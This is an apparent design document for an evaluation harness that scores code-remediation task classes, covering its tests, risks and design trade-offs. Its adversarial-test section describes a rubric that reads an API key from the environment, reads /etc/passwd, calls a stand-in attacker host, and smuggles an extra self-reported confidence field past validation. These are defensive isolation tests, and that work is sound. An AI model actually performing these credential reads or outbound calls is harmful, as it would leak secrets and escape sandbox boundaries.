bench/vuln-remediation/(10 cases, serial, cassette replay): dominated by SUT — typically 10 × 5–30 s = 50–300 s. Subprocess rubric overhead: ~50–200 ms per case (subprocess fork + Python startup + JSON parse). Total nightly: ~1–6 minutes. Acceptable for nightly cadence per ADR-0016 §Decision §5. - Wall-clock for fence-CI gate: ≤ 2 s.
- CLI cold start: ≤ 600 ms (Phase 0 import-linter contract preserved;
pydantic/click/structlogdeferred to subcommand body). - Memory: O(cases) Pydantic instances; ≤ 50 MB for a 100-case run. Subprocess rubric: ~30–80 MB resident per spawn (one at a time in serial mode).
- Disk: Each run writes ~10–30 KB JSON. 365 nightly × 2 task classes × ~20 KB = ~15 MB/yr durable. No retention/rotation in Phase 6.5; Phase 16 adds it.
- LLM cost: $0 in CI (cassettes only). Live operator runs surfaced via
BenchScore.cost_usd→BenchRunReport.total_cost_usd;--max-cost-usd(default $5.00) enforces per-run cap;flockenforces cross-process cap. - Where security/best-practices cost performance: subprocess rubric adds ~50–200 ms/case vs in-process import. At 10 cases × 200 ms = 2 s of nightly overhead — far below the SUT-dominated wall-clock. Worth it to ship the right rubric trust boundary on day one.
- Where the synthesis explicitly defers performance: no cache (G11), no parallelism (G12). The performance lens's headline 8-min cold-cache target becomes ~6-min-and-acceptable. Phase 7+ can layer cache + concurrency on the documented seams (
RubricRunnerProtocol +concurrencyparameter) without invalidating audit-chain comparability. The critic correctly identified that anything reversible can wait.
Test plan¶
Unit tests (≥ 90% line, ≥ 80% branch on src/codegenie/eval/; [B]'s budget kept)¶
test_eval_registry.py— decorator registers; duplicate raisesTaskClassAlreadyRegisteredwith both qualnames;default_registrysingleton; freshTaskClassRegistry()for tests.test_eval_models.py—frozen=Truerejects mutation;extra="forbid"rejects unknown fields;BenchScore.scorerejects 1.5/-0.1;BenchCase.dispositionrejects unknown literal;commit_sharequired iffsource != "curated".test_bench_score_static.py— load-bearing. Recursive field walk; rejectsconfidence | llm | self_reported | model_sayssubstrings. (Direct port of Phase 5'stest_objective_signals_static.py. Documented as early warning, not whole defense — critic flagged theevidence_strengthsmuggle path.)test_rubric_protocol.py—isinstance(rubric, Rubric)for every registered task class.test_loader.py— sorted bycase_id; malformedcase.tomlraisesBenchCaseLoadErrornaming the case dir; missinginput/raises with the missing path; sys.path prepend is idempotent.test_runner.py— single-case run producesBenchRunReport; SUT exception →harness_errorBenchScore; SUT timeout →timeoutBenchScore; rubric malformed output →rubric_malformedBenchScore; rubric timeout →rubric_timeout; aggregatemean_scorecorrect; cost-cap exceed cancels outstanding tasks.test_promotion.py—evidence_sufficient=Trueonly when all three conditions met;reasonsenumerates every failed condition;apply()raisesPromotionMustBeHumanAuthorized;evaluatedoes not write any file outside the (optional) recommendations dir.test_audit.py— atomic write at mode 0600; filename{utc-iso}-{8-hex}.json;prev_hashcorrectly chains the most-recent prior record for the same task class;verifydetects a single-record edit and reports the offending record.test_cli.py—--task-class=unknownexits 3; missing--task-classexits 2;--cases='001-*'filters;eval verifywalks the chain and reports tampered records.test_eval_fence.py— load-bearing. Syntheticbench/foo/with registration but nocases/fails; with 9 cases fails; fully-populated passes; non-literal first arg fails with named diagnostic; aliased import (register_task_class as rtc) fails (closes critic's alias-dodge).test_eval_package_imports_no_llm_sdk.py— AST walk; rejectimport anthropic | openai | langchain | langgraph | transformersfromsrc/codegenie/eval/.
Property tests¶
test_benchscore_invariants.py(Hypothesis) —0 ≤ score ≤ 1;failure_modesis a tuple;passed_count(report) ≤ len(report.per_case). Roadmap §Phase 6.5 testing requirement.test_runner_aggregate_correctness.py— runner-computedmean_score == statistics.fmean(s.score for s in scores).
Integration tests¶
test_eval_end_to_end_vuln.py—codegenie eval run --task-class=vuln-remediationagainst backfilled bench (10 cases) exits 0; emits 10 JSONL + 1 aggregate; writes one audit JSON; aggregatemean_scorematches snapshot (regenerated viascripts/regen_eval_snapshot.pyper ADR-0007 contract pattern).test_eval_promotion_verdict.py— syntheticBenchRunReport+ synthetic registration →PromotionVerdictwith right shape; no tier mutation.test_phase4_cassette_replay.py— one vuln case via Phase 4 cassette replay; two consecutive runs produce identicalrun_id. ADR-0016 §Tooling assertion as executable test.test_audit_chain_walks.py— write 5 records,verifyreturns clean; mutate one byte in record 3,verifyreturns mismatch at record 3.test_concurrent_cost_cap.py— two concurrent live-modeeval runinvocations on the same task class; second blocks onflock; total cost ≤ cap (closes critic's[P]concurrent-cost-leak attack).
Adversarial tests¶
test_rubric_env_read.py— rubric subprocess attemptsos.environ.get("ANTHROPIC_API_KEY"); assert returnedNonebecause subprocessenv={}.test_rubric_fs_isolation.py— rubric attemptsPath("/etc/passwd").read_bytes(); assert it succeeds (subprocess does not block FS — known gap, documented), but aPath("../../../").iterdir()fromcwd=<scratch>must show only the scratch contents.test_rubric_network_egress.py—xfailwith explicit pointer to the futureMicroVMRubricRunnerADR; rubric attemptsurllib.request.urlopen("http://attacker.example"); passes today, fails (correctly) under microVM.test_rubric_cannot_smuggle_llm_assessment.py— rubric tries to return a dict with extrallm_confidencefield; assertextra="forbid"raises and the case becomesrubric_malformed.test_promotion_apply_blocked.py— direct call topromotion.apply(...)raisesPromotionMustBeHumanAuthorized.test_chain_tamper_detected.py— rewrite a record byte;audit.verifyreturns mismatch;promote-verdictexits non-zero.
E2E¶
test_eval_run_against_real_bench.py—subprocess.run(["codegenie", "eval", "run", "--task-class=vuln-remediation"]); exit 0; one new audit file; stdout contains 10 JSONL + aggregate.
Golden files¶
tests/snapshots/eval_run_report.v1.json— frozenBenchRunReportshape; regen viascripts/regen_eval_snapshot.py(ADR-0007 pattern).
Risks (top 5)¶
- Subprocess rubric isolation is weaker than microVM and the gap is real. A merged-through-CODEOWNERS rubric can read host FS outside scratch (
/etc/passwd), egress to network, and consume unbounded RSS until OS kill. Mitigation: CODEOWNERS + two-reviewer rule onbench/**/rubric.pyis the L1 defense; theBenchScoreshape is identical between subprocess and microVM so a future ADR-amend swaps the runner without invalidating prior audit records (the load-bearing critic argument). The roadmap explicitly tracks this in a Phase 16 ADR slot. - Bench-case curation cost dominates Phase 6.5's actual schedule. ADR-0016 §Tradeoffs flags this; no design can fix it. Mitigation: ship
bench/vuln-remediation/from Phases 3–4's solved-example corpus (zero net curation, just re-shaping); shipbench/migration-chainguard-distroless/with 3 seed cases from publicly-documented Chainguard examples; Phase 7 owns the expansion to ≥10. Critic correctly noted no design allocates engineering for case extraction — flagged for the implementation plan. - Rubric correctness is itself untested. A bug in
rubric.score(...)makes every bench score wrong. Mitigation: every rubric ships with its own unit tests underbench/{tc}/tests/; CI runs them. Mutation-testing the rubric is ADR-0016 §Open Q5 — Phase 16 territory. current_tierlives inregistration.py(a Python file edited by humans). A typo in a tier promotion PR ("silver" → "siver") could pass review and silently fail the gate'sLiteral[...]check at runtime. Mitigation:BenchCase.dispositionandPromotionVerdict.current_tierandTaskClass.current_tierall useLiteral["bronze","silver","gold","platinum"]so Pydantic catches typos at registration import — fence-CI runs registration imports for every task class.- The audit chain catches local tamper but not host-compromise-with-full-rewrite. An attacker with shell on the operator can rewrite every
.jsonrecord and recompute everyprev_hash— local re-verify passes. Mitigation: Phase 16 ADR introduces published anchors (a daily commit of the chain head into git history); deferring per G13 because Sigstore vs. GPG is the wrong question to ship in Phase 6.5. Documented as a known gap.
Synthesis ledger¶
Vertex count¶
- Performance design
[P]: ~38 atomic decisions extracted (cache, sut_digest, cassette_digest, asyncio pool, JSONL stream,repo.tar.zst, cost cap,runs.jsonlindex, etc.) - Security design
[S]: ~42 (microVM rubric, BLAKE3 chain, Sigstore anchors, two-signature curation,cases/digests.yaml, TB-1..TB-8 boundaries,apply()raises, etc.) - Best-practices design
[B]: ~34 (Protocol vs ABC,default_registrysingleton,signal.SIGALRM,_codegenie_benchimport prefix,docs/trust-tiers.yaml,tomllib, etc.) - Total: ~114 vertices.
Edges¶
- AGREE: 22 (Pydantic
frozen=True, extra="forbid";@register_task_classdecorator;TaskClassAlreadyRegisteredcollision shape;BenchScore.score ∈ [0,1]; static-introspection test on banned substrings; cassettes-only in CI; promotion is human;bench/{tc}/{cases,rubric.py,registration.py}directory contract; per-casetry/except; CODEOWNERS onbench/**; etc.) - CONFLICT: 13 (concurrency model; rubric isolation; cache layer; audit shape — JSONL vs chain vs Phase-0 RunRecord; bench provenance — descriptive vs two-signature vs CODEOWNERS-only; archive format —
.tar.zstvs unspecified vsinput/expected/dirs; cost cap; promotion authority shape; fence-CI implementation; hash algorithm; tier-state location — registration vs YAML; timeout mechanism; sandbox stack) - COMPLEMENT: 8 (
[B]'s typed errors +[S]'s adversarial tests +[P]'s property tests;[B]'s loader pattern +[S]'s digest verification;[P]'s cost cap +[B]'s ledger surfacing +[S]'s cost-discussion-deferral) - SUBSUME: 5 (
[B]'s and[P]'s rubric isolation are weaker variants of the same thing;[S]'sBenchRunRecordsubsumes[B]'sEvalRunRecordshape)
Conflict-resolution table¶
| Dimension | [P] picks |
[S] picks |
[B] picks |
Winner | Exit-fit | Roadmap-fit | Commitments-fit | Critic-fit | Sum |
|---|---|---|---|---|---|---|---|---|---|
| Rubric isolation | In-process import | Per-case microVM (Firecracker/gVisor) | In-process import + Pydantic + static check | Subprocess (env={}, JSON I/O) — synth |
3 | 3 | 3 | 3 | 12 |
| Concurrency | asyncio pool sized to sandbox cap | Strict serial (asserted) | Serial + SIGALRM | Serial in 6.5 with concurrency seam — [B+S]+synth |
3 | 3 | 3 | 2 | 11 |
| Cache layer | Content-addressed BenchScore cache |
None (deferred) | None | None in 6.5; documented seam — [S+B]+synth |
3 | 3 | 3 | 3 | 12 |
| Audit shape | JSONL stream + runs.jsonl index |
BLAKE3-chained records + Sigstore anchors | Phase-0 RunRecord JSON | Chained JSON records (no Sigstore) — [B+S] minus L6 |
3 | 3 | 3 | 3 | 12 |
| Bench provenance | Descriptive metadata | Two-signature CODEOWNERS + Sigstore + cases/digests.yaml |
CODEOWNERS + 90-day staleness warn | CODEOWNERS + per-case cassette_blake3 advisory + staleness warn — [B]+synth |
3 | 3 | 2 | 3 | 11 |
| Bench archive format | .tar.zst level 3 |
Tar-serialization (unspecified) | input/+expected/ dirs |
input/+expected/ dirs (no archive) — [B] |
3 | 2 | 3 | 3 | 11 |
| Cost cap | --max-cost-usd mid-run abort |
Deferred to Phase 13 | Sum into report only | --max-cost-usd + flock cross-process — [P]+synth |
3 | 3 | 3 | 3 | 12 |
| Promotion authority | Read-only verdict as last JSONL line | apply() raises; tier in registration.py#current_tier |
Read-only verdict; tier in docs/trust-tiers.yaml |
apply() raises + tier in registration.py — [S] |
3 | 3 | 3 | 3 | 12 |
| Fence-CI implementation | Regex on first/second line | Three gates incl. workflow-digest meta-gate | AST walk for literal name | AST walk + literal-symbol-name lint (no aliases) — [B+S]+synth |
3 | 3 | 3 | 3 | 12 |
| Hash algorithm | blake3 PyPI dep |
BLAKE3 via codegenie/hashing.py |
SHA-256 implied | BLAKE3 (matches Phase 0) in [project.optional-dependencies].eval — [S]+synth |
3 | 3 | 3 | 3 | 12 |
| Tier-state location | On registration (implicit) | On registration | docs/trust-tiers.yaml |
On registration — [P+S] |
3 | 3 | 3 | 3 | 12 |
| Timeout mechanism | asyncio.wait_for (implicit) |
Subprocess wall-clock | signal.SIGALRM |
asyncio.wait_for — [P]+synth |
3 | 3 | 3 | 3 | 12 |
| Sandbox stack | None (in-process) | Firecracker on Linux/CI; gVisor-on-Lima on macOS | None | Subprocess only — synth (defers Phase 5's sandbox stack question) | 3 | 3 | 2 | 3 | 11 |
(Score legend per Step-3: 0=cannot win, 1=poor fit, 2=acceptable, 3=strong fit. Veto-strength on column 3.)
Shared blind spots considered¶
| Blind spot (critic) | Carried forward / departed | Why |
|---|---|---|
All three keep bench/ in same repo (ADR-0016 §Open Q4 deferred) |
Carried forward for Phase 6.5; flagged for Phase 7 review | Splitting introduces the org-shared-bench question (CODEOWNERS spans repos, etc.) the critic correctly identifies as Phase 7+ territory. Same-repo is the conservative default; flagged in §Risks. |
| All three hand-wave the live-LLM cadence | Carried forward (no live-cadence commitment); G8 caps cost, defers cadence to Phase 13 | The critic is right that nobody knows when live evals run. We ship cost protection (--max-cost-usd + flock) so nobody can be surprised by a bill, and defer cadence per ADR-0016 §Open Q3. |
All three treat bench/vuln-remediation/ curation as easy |
Departed — flagged in §Risks #2 | Critic correctly notes none of the three allocates engineering for case extraction. Synthesizer flags this for the implementation plan; the harness is necessary but not sufficient — somebody has to extract 10 cases from the Phases 3–4 corpus. |
Departures from all three inputs¶
- Subprocess
RubricRunnerinstead of in-process ([P]/[B]) or microVM ([S]). None of the three proposed it. The synth chooses subprocess because it captures ~80% of microVM's isolation at ~5% of the cost, runs everywhere Python runs (closes critic's CI-substrate attack), and — critically — preservesBenchScoreshape so a future microVM swap doesn't invalidate audit records. Rationale: rubric isolation is the one non-reversible decision (per critic's §"Which disagreement matters most for this phase?"); shipping the boundary today is the load-bearing move; shipping the strongest possible boundary is not (microVM costs more than its threat reduction at this phase, given CODEOWNERS L1). flock-based cross-process cost cap. None of the three handled the critic's "two concurrent live runs blow the cap" attack. Synth adds it inrun_eval; CI cassette runs (cost = 0) skip the lock so they don't serialize unnecessarily.- Tier state on
registration.py#current_tier, notdocs/trust-tiers.yaml([B]).[S]has this;[B]and[P]don't. Synth picks[S]'s shape because the YAML-central-edit pattern would force Phase 7 to edit a file outsidebench/migration-chainguard-distroless/, violating the no-edits-to-existing-code invariant. - No central
cases/digests.yaml(departure from[S]).[S]'s "one mismatch → abort" containment is the wrong shape (critic correctly flagged). Per-casecassette_blake3incase.toml, advisory in 6.5; strict in 7+. Closes[S]'s blast-radius problem. - No Sigstore anchors / operator-fingerprint signing in 6.5 (departure from
[S]). Critic correctly identified the cost/threat asymmetry. Deferred to Phase 16 ADR slot. Local chain in 6.5 still catches every mid-stream tamper; published anchors solve a different (host-compromise) problem. asyncio.wait_fortimeout, notsignal.SIGALRM([B]). Critic correctly identified SIGALRM-vs-asyncio incompatibility. Phase 6's SUT is async; the harness must be too.
Exit-criteria checklist¶
Per roadmap.md §Phase 6.5 exit criteria:
| # | Criterion | Satisfied by |
|---|---|---|
| 1 | src/codegenie/eval/ package exists; @register_task_class, BenchScore, harness runner, trust-tier promotion gate are unit-tested. |
All Components above; tests/unit/test_eval_* |
| 2 | bench/vuln-remediation/cases/ ≥ 10 curated cases with provenance metadata; rubric.py scores the full set; aggregate bench_score.lower_bound_95 recorded as bronze→silver candidate (numeric value deferred to ADR-0015). |
bench/vuln-remediation/ directory contract + integration test test_eval_end_to_end_vuln.py |
| 3 | bench/migration-chainguard-distroless/cases/ ≥ 3 seed cases + working rubric.py; Phase 7 inherits and expands. |
bench/migration-chainguard-distroless/ skeleton |
| 4 | Fence-CI: PR adding @register_task_class("foo") without bench/foo/{cases,rubric.py,registration.py} fails with specific diagnostic. |
tests/unit/test_eval_fence.py two-stage AST + dir-walk |
| 5 | Trust-tier promotion gate wired but does not auto-promote. | PromotionGate.evaluate (read-only) + apply() raises unconditionally |
| 6 | codegenie eval run --task-class=vuln-remediation exits 0 on backfilled bench, emits aggregate + per-case BenchScore to stdout (JSON) + .codegenie/eval/runs/<utc-iso>-<short>.json. |
cli.py + audit.py + integration test |
| 7 | Phase 7 can reference "bench/migration-chainguard-distroless/cases/ ≥ 10 cases with bench_score.lower_bound_95 ≥ tier_threshold[bronze]" as hard precondition. |
Threshold on TaskClass.min_cases_for_promotion + PromotionGate reads it |
Load-bearing commitments check¶
| Commitment | How design honors it |
|---|---|
| No LLM in the gather pipeline | Harness imports zero LLM SDKs; test_eval_package_imports_no_llm_sdk.py enforces structurally. SUT (Phase 6) calls LLMs via Phase 4 cassettes; harness never does. |
| Facts, not judgments | BenchScore is per-case facts; BenchRunReport carries no aggregate_passed boolean — that's a judgment computed by PromotionGate.evaluate from facts + tier thresholds. |
| Honest confidence | Static-introspection rejects confidence/llm/self_reported/model_says field names; extra="forbid" rejects unknown fields; failure_modes surfaces every mode (not just the first); block-severity failure modes block promotion regardless of mean_score. |
| Determinism over probabilism for structural changes | Harness is deterministic given fixed cassettes + cases + rubric; run_id = sha256(...) is content-addressed; two engineers get byte-identical aggregates. |
| Extension by addition | New task class = new bench/{slug}/ directory + one decorator call. Zero edits to src/codegenie/eval/. Tier state on registration.py (no central YAML); no central digest manifest. Phase 7's no-edits invariant is preserved. |
| Organizational uniqueness as data, not prompts | Rubrics are Python (data shape: Rubric Protocol); per-task-class min_cases_for_promotion is data on the registration; tier thresholds are loaded from registration, not prompted. |
| Progressive disclosure for context | BenchCase carries paths, not inlined fixtures; runner loads case bytes lazily; audit record indexes per-case results by case_id. |
| Humans always merge (extended to "humans always promote") | PromotionGate.apply() raises unconditionally; tier change is a hand-edited PR against registration.py#current_tier reviewed by CODEOWNERS. ADR-0009 not amended. |
Roadmap coherence check¶
What prior phases established that this design depends on:
- Phase 0: project scaffolding (pyproject.toml extras), CLI click integration, codegenie/audit.py shape (Phase-0 RunRecord), import-linter contract, codegenie/hashing.py (BLAKE3).
- Phase 4: cassette discipline (replay in CI; no live LLM); per-cassette identity stable enough to hash per case (the critic correctly flagged that Phase 4 must commit to per-case-addressable cassette identity — flagged as a Phase 6.5 → Phase 4 coordination requirement in §Open questions).
- Phase 5: ADR-0014 (extra="forbid" introspection pattern); ADR-0003 (@register_signal_kind shape mirrored); ADR-0006 (Protocol-when-structural / ABC-when-default-behavior split); ADR-0016 (this design implements it); ADR-0008 (LLM-Judge deferral — this design's bench/judgment-arbitration/ slot is reserved for the un-deferral ADR).
- Phase 6: VulnRemediationSut is the system-under-test contract for vuln-remediation; the LangGraph builder and per-workflow SQLite checkpointer remain Phase 6 internals behind that contract.
What this design establishes that later phases will need:
- Phase 7 inherits the registry, the RubricRunner Protocol, the bench/ directory contract, the audit chain, and uses bench/migration-chainguard-distroless/ as the second worked example. Phase 7's no-edits-to-existing-code invariant is preserved.
- Phase 13 reads BenchRunReport.total_cost_usd from .codegenie/eval/runs/ audit records (cost ledger ingestion). Phase 13's outcome-ledger reconciliation routes through bench/{tc}/cases-pending/ (TB-7 contract reserved here, not implemented).
- Phase 15 (agentic recipe authoring) registers bench/agentic-recipe-authoring/ via the same decorator; rubric scores generated recipes against held-out repos.
- Phase 16 swaps SubprocessRubricRunner → MicroVMRubricRunner via ADR; adds Sigstore/GPG audit anchors; adds last_validated_at staleness probe; adds chain-publication PR job.
New ADRs implied by this design (to be written under docs/phases/06.5-per-task-class-eval-harness/ADRs/):
1. 0001-eval-registry-mirrors-probe-registry.md — the @register_task_class decision and why we use it instead of entry points.
2. 0002-benchscore-frozen-extra-forbid.md — the Pydantic discipline mirroring Phase 5 ADR-0014.
3. 0003-rubric-as-protocol.md — Protocol-not-ABC; RubricRunner strategy seam.
4. 0004-promotion-gate-read-only-verdict.md — apply() raises; tier on registration.py.
5. 0005-subprocess-rubric-runner-as-isolation-boundary.md — NEW (synth) — the load-bearing rubric-isolation decision; documents the subprocess-now / microVM-later split and the audit-chain comparability argument.
6. 0006-eval-audit-chain-without-anchors.md — NEW (synth) — chained EvalRunRecord ships without Sigstore/GPG anchors; future phase ADR adds them.
7. 0007-no-cache-no-parallelism-in-6.5.md — NEW (synth) — defers [P]'s cache + parallelism to Phase 7+ via documented seams.
Open questions deferred to implementation¶
- Phase 4 cassette per-case identity contract. All three designs assume Phase 4 commits to a per-case-addressable cassette identity the harness can hash without importing Phase 4 internals. Phase 4's
final-design.mddoes not commit to this. Action: Phase 6.5 implementation must coordinate with Phase 4's owner to add a publiccassette_path_for(task_class, case_id) -> Pathhelper; failing that, the harness readscase.toml#cassette_pathand trusts the curator. Documented inbench/README.md. - Bench-case extraction tooling. None of the three designs specify how to extract ≥10 vuln-remediation bench cases from the Phases 3–4 solved-example corpus. The implementation plan must allocate engineering for this (estimated 1–2 weeks).
- Live-LLM cadence. When does the live (non-cassette) eval run? Once per cassette re-record? Once per recipe-set release? Per ADR-0016 §Open Q3, this is deferred to Phase 13 cost ledger;
--max-cost-usd=$5.00default is conservative until Phase 13 lands. bench/repo split. ADR-0016 §Open Q4 defers same-repo-vs-split. Phase 6.5 keeps same-repo; Phase 7's exit review reconsiders if migration cases include customer Dockerfiles.- Rubric mutation testing. ADR-0016 §Open Q5; Phase 16 territory. Phase 6.5 ships per-rubric unit tests under
bench/{tc}/tests/as the immediate mitigation. MicroVMRubricRunnersubstrate choice. When the future ADR un-defers microVM rubric isolation, it must pick between Firecracker, gVisor, Lima, Docker-in-Docker, or wasmtime. Coordinate with Phase 5's sandbox-stack ADR-0019 — the same substrate decision should apply.- Audit anchor PR shape. Chain-head publication into git history (without Sigstore) is a one-line follow-on PR — defer to whichever phase first finds host-compromise-detection load-bearing (likely Phase 16). The chain-only approach in 6.5 is sufficient for the threats in scope.